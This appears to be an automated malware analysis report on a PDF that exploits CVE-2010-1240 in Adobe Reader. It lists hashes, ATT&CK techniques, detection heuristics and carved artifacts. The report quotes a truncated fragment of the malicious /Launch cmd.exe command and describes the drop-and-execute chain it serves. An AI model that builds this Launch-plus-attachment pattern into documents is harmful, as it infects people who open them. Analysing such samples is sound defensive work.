Malicious PDF — malware analysis report

Static analysis result for SHA-256 1b7a0590c2a87148…

MALICIOUS

PDF

216.9 KB Created: 2009-09-26 07:34:11 +02:00 Authoring application: Writer (via OpenOffice.org 3.0)
MD5: 7ce4b80fceb4ae9c6afe94e3dc644faa SHA-1: c2cbcabd85132efc918f0173ec9d6902476bef5a SHA-256: 1b7a0590c2a871487afd131082e890d53f8e7d58ac2410402b07dcc78bf99a8f
304 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1059.003 Windows Command Shell T1105 Ingress Tool Transfer

The PDF file contains embedded JavaScript and a launch action that exploits CVE-2010-1240 in Adobe Reader. This action executes cmd.exe with parameters designed to download and run a secondary payload. The specific command executed is: cmd.exe /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "%USERPROFILE%\����\ADMPlugin.apl" (cd/D "%USERPROFILE%\����"). This indicates a downloader or dropper functionality.

Heuristics 8

  • Adobe Reader Launch action command execution critical CVE exact CVE_2010_1240
    PDF uses the Adobe Reader/Acrobat Launch action pattern associated with CVE-2010-1240: cmd.exe is invoked with attacker-controlled parameters, paired with an embedded/exported payload.
  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "%USERPROFILE%\\����\\ADMPlugin.apl" (cd/D "%USERPROFILE%\\����"' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • ClamAV: Pdf.Tool.Agent-1388586 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Tool.Agent-1388586
  • /Launch action paired with attachment-dropping JS API high PDF_LAUNCH_PLUS_DROPPER_JS
    PDF combines a /Launch action with a JavaScript API call that writes or opens an attached/external resource — the canonical shape of the CVE-2010-1240 /Launch + exportDataObject family. Benign PDFs do not pair these surfaces; the combination indicates a drop-and-execute chain regardless of the specific JS API knobs or /Launch target.
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload

Extracted artifacts 10

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0110_000.js
35efbffd979ea858d6d8f7921ee358ca428a1c5a5ff180aba705d55c1f85cc16		 pdf-javascript-stream PDF /JS object 110 at offset 0x35DEF 58 bytes
font_00_sfnt_off00018873.bin
f027842567b04c926ad746e8dfdc4f8cdd2e3c7e0220264a22bb516569de8c36		 pdf-font-stream PDF embedded font (sfnt) at offset 0x18873 39760 bytes
font_01_sfnt_off0001e18a.bin
da753cc0b5163c9b6666572dbeb35b7b5caf4a56d9c22c99c36835925c000a71		 pdf-font-stream PDF embedded font (sfnt) at offset 0x1E18A 33672 bytes
font_02_sfnt_off00023149.bin
23ac8feb518c8c727acc6a954bb623e333337c9458521aed483fcc8d89f418c1		 pdf-font-stream PDF embedded font (sfnt) at offset 0x23149 12752 bytes
font_03_sfnt_off0002558e.bin
c8fd7189737c38a43b9ba034337799f502028b5db5a6037bd1df4c486f3233e0		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2558E 13136 bytes
font_04_sfnt_off00027bf4.bin
cf699c117fd0bb7368c625645b874f03c477a382b67075e98dd54d87de53958b		 pdf-font-stream PDF embedded font (sfnt) at offset 0x27BF4 27096 bytes
font_05_sfnt_off0002ca67.bin
34829650519fe758a893e02057f5c7c1070378add027225386180ba60993be24		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2CA67 13700 bytes
font_06_sfnt_off0002f2cf.bin
bf36ecd37d117b665b1c68abb1c41fbb1a9d46c2c583bdb8512681835e553b91		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2F2CF 14892 bytes
font_07_sfnt_off00031db2.bin
37478039963094b7b89fb24df19adb1f5ee171f766ade680ac5516bb23ede59f		 pdf-font-stream PDF embedded font (sfnt) at offset 0x31DB2 13576 bytes
font_08_sfnt_off00033c21.bin
df903f2017d43426972294ce96b065da76255f4a0de84e466c7a4dd6181632c2		 pdf-font-stream PDF embedded font (sfnt) at offset 0x33C21 1780 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.